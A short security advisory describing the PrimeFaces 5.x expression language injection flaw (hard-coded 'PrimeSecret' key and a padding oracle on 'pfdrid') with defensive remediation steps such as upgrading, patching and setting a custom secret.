PrimeFaces 5.x Expression Language injection
Description
PrimeFaces is an open-source User Interface (UI) component library for JavaServer Faces (JSF) applications. Versions 5.x contain two critical vulnerabilities that allow remote code execution without authentication:
- Hard-coded Encryption Key (PrimeSecret): PrimeFaces uses a default, hard-coded passphrase called "PrimeSecret" to encrypt sensitive parameters including "pfdrid". This shared secret is publicly known and identical across all installations.
- Padding Oracle Attack (PrimeOracle): The cryptographic implementation used to decrypt parameters such as "pfdrid" is vulnerable to padding oracle attacks, allowing attackers to decrypt and forge encrypted values.
Remediation
Take the following steps to remediate this vulnerability:
- Upgrade PrimeFaces: Update to PrimeFaces version 6.0 or later, which addresses both vulnerabilities. This is the recommended long-term solution.
- Apply the Official Patch: If immediate upgrade is not possible, apply the official fix available at the GitHub issue referenced in the Web references section (issue #1152).
- Configure a Custom Encryption Key: Replace the default "PrimeSecret" passphrase with a strong, randomly generated secret unique to your application. Add the following to your web.xml configuration:
<context-param> <param-name>primefaces.SECRET</param-name> <param-value>YOUR_STRONG_RANDOM_SECRET_HERE</param-value> </context-param> - Verify the Fix: After applying updates, test that encrypted parameters cannot be decrypted using the default "PrimeSecret" key.
- Review Logs: Examine application and web server logs for suspicious activity or exploitation attempts targeting PrimeFaces endpoints.